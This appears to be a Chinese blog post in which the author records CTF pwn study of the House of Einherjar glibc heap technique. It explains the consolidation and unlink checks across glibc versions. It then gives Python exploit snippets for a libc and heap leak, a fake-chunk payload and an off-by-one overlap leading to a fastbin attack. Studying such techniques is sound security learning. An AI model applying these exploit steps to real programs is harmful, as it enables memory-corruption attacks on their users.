【我的 PWN 学习手札】House of Einherjar

已于 2024-12-12 15:52:32 修改
阅读量663 收藏 9
点赞数 24
分类专栏: 【我的 PWN 学习手札】 文章标签: ctf heap pwn
于 2024-12-11 23:55:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Mr_Fmnwon/article/details/144393702
版权

利用简单,甚至可实现任意地址malloc。

前言

之前学off-by-null的时候,经典的做法是通过覆盖prev-inuse位,释放后造成堆块重叠再进行后续利用。而house of enherjar相比与off-by-null,需要泄露堆地址,条件更宽裕,能够实现更强的效果。

好久没写博客了,但其实学习没有停下,趁着回头巩固,补一补笔记。

一、基本原理

我们知道,如果一块被申请的(且大小不在fastbin范围、无tcachebin或tcachebin填满)malloc chunk 释放时,如果前一块被标记为 free chunk,则会进行向前合并的操作。

5f128b4c6fe549a79b5f4060bfa8e55c.png

现在如果我们对各chunk的控制字段略加修改(即拥有堆溢出、任意地址写、UAF等条件),那我们就可能造成对于一些数据的覆盖,即overlapping。这是因为ptmalloc2堆管理机制下,向前合并时,判断前一个chunk是否释放、前一个chunk的位置,分别是通过chunk控制字段的prev_inuse位和prev_size位找到的。

739d5efee12a444fb6462230e00daf61.png

二、具体分析

1、释放smallbin大小的chunk,判断向前合并条件是prev-inuse位为0

2、寻找前一个chunk的位置通过prevsize来定位(prev-inuse置0时,本字段启用)

因此我们需要修改(严格的方式是溢出一个字节null),并设置prevsize为合适大小

3、合并时,将prev-chunk从链表中unlink下来,有一些检查和判断

if (__builtin_expect(FD->bk != P || BK->fd != P, 0))                 
    malloc_printerr(check_action, "corrupted double-linked list", P, AV);

只需要将fake_chunk的fd和bk指向fake_chunk本身即可绕过 

 4、glibc2.26后,prevchunk的size回合prevchunk.nextchunk的size进行检查(而不是malloc chunk 和 prevchunk.nextchunk的size进行检查) 

if (__builtin_expect(chunksize(P) != prev_size(next_chunk(P)), 0))   
    malloc_printerr("corrupted size vs. prev_size");

5、glibc2.29及以后,检查了prevsize和prevchunk.size是否相等 

/* consolidate backward */
if (!prev_inuse(p)) {
    prevsize = prev_size (p);
    size += prevsize;
    p = chunk_at_offset(p, -((long) prevsize));
    if (__glibc_unlikely (chunksize(p) != prevsize))
        malloc_printerr ("corrupted size vs. prev_size while consolidating");
    unlink_chunk (av, p);
}

为此我们大概布局如下:

eb0f5056fd394bba9e508ba38a6a09e8.png

glibc2.26以后,会增加检查;通过如下方式绕过。

其中箭头出的方向表示由该数据开始索引,箭头指向的地方标识索引到的位置。下面两个黄色箭头标识这两个数据要对应相等,且先后索引关系为箭头方向。

这里即,满足fake_size寻址到下一个chunk的prevsize,两者需要相等。

3a6e3b7b69f44b2bacc7069f2c703717.png

glibc2.29及以后,检查变严苛;这里从当前chunk索引到前一个chunk,比较prevsize和size。也就是说,prevsize必须等于fakechunk的fakesize了。

48fc420a4e504dada980252aadb2bf23.png

三、调试分析

 

首先leak libc 和 heap 备用

add(0,0x208)
add(1,0x68)
add(2,0x1f8)
add(3,0x68)
delete(0)
delete(2)

# leak libc
show(0)
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x3c4b78
success(hex(libc.address))

# leak heap
edit(2,1,b'a')
show(2)
heap_base=u64(io.recv(6).ljust(8,b'\x00')) & ~0xfff
edit(2,1,b'\x00')
success(hex(heap_base))

然后布局fake_chunk

payload=b''
payload+=p64(0) #prevsize
payload+=p64(0x200+0x70+0x1) #size
payload+=p64(heap_base+0x10) #fd
payload+=p64(heap_base+0x10) #bk
edit(0,len(payload),payload)

 dec4320549f740efa7eb590c3b549f8f.png

 然后通过off-by-one修改即将释放chunk的控制头字段

87ca31ef0a724ab581d905b7403c79f8.png

让我们看一下这样形成的chunk关系:

fba839e96efb437b99ac0290eaa7795a.png 继续,释放掉堆块,构成overlapping

25bdea7319064b31a4ce24655dc8abaf.png

此时已经完成攻击,现在堆块布局如下:

55aa11033ebe41779dd1f22433962f0c.png

接下来只需要释放overlapping的中间的malloc chunk,然后通过切割unsortedbin中的合并的大chunk,实现对fastbin中chunk的数据修改,完成fastbin attack。当然这只是一种利用House of Einherjar的getshell思路。 

 

House of einherjar
tbsqigongzi的博客
07-31 515
释放堆块时,unlink后向合并堆块,强制使得malloc返回一个几乎任意地址的chunk。free函数中的后向合并核心操作如下后向合并时,新的chunk的位置取决于chunk_at_offset(p,-((long)prevsize))
House Of Einherjar
qq_61670993的博客
11-20 232
house of Einherjar
House of Einherjar
saulgoodman的博客
02-08 174
然后再申请一个和chunk_1一样大小的chunk_4,这时chunk_4也是指向chunk_1,因为之前unsorted bin中的大小为chunk_1+chunk_2,申请chunk_4时unsorted bin做分割吧chunk_1给chunk_4,这时有2个chunk指向同一个chunk。最后进入unsorted bins的地址是chunk_0的地址,注意这里chunk_1并没有被free,所以再申请回chunk_0,之后main_arena的地址就放在了chunk_1中。
【我的 PWN 学习手札】malloc_init_state attack
最新发布
Mr_Fmnwon的博客
10-24 1055
malloc_consolidate 会根据 global_max_fast 是否为 0 来判断 ptmalloc 是否已经初始化,因此如果能 通过任意地址写将 global_max_fast 置 0 然后触发 malloc_consolidate 就可以调用 malloc_init_state。
pwn工具箱之house of force
jmp esp
07-03 1056
house of force基本信息 利用类型:堆利用 堆利用类型:top chunk相关 利用思想:通过修改top chunk大小,使得分配任意大小都是从top chunk里边切出来,这样分配一个大小占满想要写的位置和当前分配位置top chunk的差,下一个分配就可以分配出想要写的位置 利用难点 需要有办法能够更改到top chunk大小 需要能够知道当前位置和要写位置的差值 需要能够自由控制将
攻防世界(pwnhouse_of_grey——Linux系统文件初探
PLpa的博客
03-06 1099
前言: 此题涉及到Linux的两个系统文件:maps和mem,不了解的可以看科普(传送门)。 64位,保护全开,打开IDA64看看程序到底是怎么设计的。 可以看到程序首先打开系统,然后用mmap映射了一片区域,并对fn函数进行操作,我们双击进入fn函数看看情况: fn函数里边又5个功能,没个功能都有用途,分析一下每个功能: 第一个功能从字面意思看就知道是用来定位文件,然后打开他,但是不能打...
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记 Pwn是计算机安全领域中的一个重要方向,旨在研究和学习 Binary Exploitation,CTF 等安全知识。本文将从Pwn学习路线及学习笔记入手,总结作者在学习Pwn过程中的心得体会和经验。 一、前期...
pwn学习历程.pdf
09-30
标题中的“pwn学习历程.pdf”表明该文档是关于学习pwn(利用程序中的漏洞,通常用于CTF(Capture The Flag)比赛中的pwn题目)的详细学习路径和资料汇总。文档的描述中强调了内容的系统性、模块化以及实用性,特别...
PWN学习House of 系列】House Of Einherjar
weixin_41748164的博客
01-01 1210
溢出写、off by one、off by null。
Tinypad Seccon CTF 2016(House Of Einherjar)
Bill
04-18 1403
Tinypad Seccon CTF 2016(House Of Einherjar) 序言 随着对how2heap学习, 难度也是越来越大, 改革进入了深水区. 程序运行 1.菜单 | [A] Add memo | | [D] Delet...
House Of Einherjar(2016 Seccon tinypad)
九层台
09-02 1158
栗子https://github.com/tower111/software.git got表不可写:劫持程序执行流的思路1.复写hook函数。2.覆盖返回地址 canary和NX保护。 漏洞和数据结构 if ( v13 > 0 && v13 <= 4 ) { if ( *(_QWORD *)&tinypad[16 *...
15.house_of_einherjar
06-10 342
源代码 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <string.h> 4 #include <stdint.h> 5 #include <malloc.h> 6 7 /* 8 Credit to st4...
house-of-einherjar-tinypad
csdn546229768的博客
01-19 492
题目 : secconctf2016_tinypad 保护 分析 add部分: edit部分: dele部分: 自带的show部分: 其中堆块信息保存在tinypad[0x100]处理解图如下: 思路 上面ida分析的注释中对应解释了程序漏洞所在,那么首先进行libc泄露,首先malloc 4个chunk其中 chunkA : 必须为unsort bin 且size必须是8(十六进制)结尾,因为如果malloc 0xe8 ----真实大小—> 0xf0 这时可以写入的数据为0xe8 通过
CTF竞赛权威指南》|house of einherjar
qq_50883855的博客
11-22 941
house of einherjar
House of XXX的核心原理
weixin_30500473的博客
11-26 245
最近接触了堆溢出的pwn,对网上解释绕过safeunlink的方法(各种HouseofXXX)的解释感觉不够简洁精要,故作此总结记录。关键点可以只看红色加粗部分。 首先,堆溢出最好的利用方法是能覆盖关键变量,例如函数指针,但这样的场景可遇不可求。 堆溢出的unlink利用方法是通用的利用方法,但是在linux加入了safeunlink检查之后,这种利用方法基本失效...
how2heap-2.23-15-house_of_einherjar
blind cat
01-08 447
时,想着在被poison_null_byte的chunk上方进行布局利用,当时想到的利用方式原来就是这个。
LCTF 2016 PWN200(House Of Spirit)
Bill
03-24 1788
L-CTF 2016 pwn200 漏洞简介 The house of Spirit The House of Spirit is a little different from other attacks in the sense that it involves an attacker overwriting an existing pointer before it is ‘fr...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值